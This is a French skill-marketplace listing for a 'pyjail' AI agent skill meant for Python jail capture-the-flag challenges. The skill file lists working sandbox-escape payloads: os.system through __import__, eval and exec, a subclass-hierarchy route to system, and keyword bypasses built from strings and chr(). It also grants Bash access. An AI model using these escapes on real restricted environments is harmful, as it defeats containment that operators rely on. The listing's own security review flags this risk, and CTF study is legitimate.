Notre avis
Cette compétence permet de contourner les restrictions d'un sandbox Python en utilisant la hiérarchie des classes et des techniques d'obfuscation de code.
Points forts
- Fournit des techniques concrètes (commandes de base, hiérarchie de classes, contournement par encodage)
- Inclut une référence rapide et des aides au débogage
- Couvre les défis courants de jail CTF
Limites
- Nécessite une connaissance des internes de Python (les indices de hiérarchie de classes peuvent varier)
- Certaines techniques peuvent échouer face à des sandboxes avancés avec des restrictions supplémentaires
- Ce n'est pas une solution universelle
Lorsque vous devez échapper d'un sandbox Python ou exécuter des commandes dans un environnement Python filtré.
Pour le développement Python général ou des tâches non liées à la sécurité.
Analyse de sécurité
PrudenceThe skill equips the AI with techniques to break out of restricted Python environments, such as using os.system or class hierarchy exploits. While intended for sanitized environments like CTF challenges, the inclusion of Bash as an allowed tool means these commands could be executed on the host, posing a risk of misuse.
- •Provides methods for arbitrary code execution via Python sandbox escape, which could be used to run destructive commands if abused.
Exemples
Use Python's os module to execute the command 'cat flag.txt' in a restricted environment.Escape the Python sandbox using the class hierarchy method to execute a shell command like 'id'.Find the index of a useful class (e.g., with 'wrap' in its name) for sandbox escape by iterating subclasses.name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob
Python Jail Escape Skill
Quick Workflow
Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag
Quick Reference - Common Escapes
# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")
# Using breakpoint (Python 3.7+)
breakpoint() # Drops into pdb, then !cat flag.txt
# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')
# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')
Reference Files
| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |
Quick Debugging
# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
if 'wrap' in str(c): print(i, c)
# Check available builtins
dir(__builtins__)
Auditeur de Securite
Securite
Analyse le code pour detecter les vulnerabilites OWASP Top 10.
Checklist de Sécurité OWASP
Securite
Génère des checklists de sécurité applicative basées sur l'OWASP Top 10.
Modélisation de Menaces
Securite
Génère des documents de modélisation de menaces avec analyse STRIDE.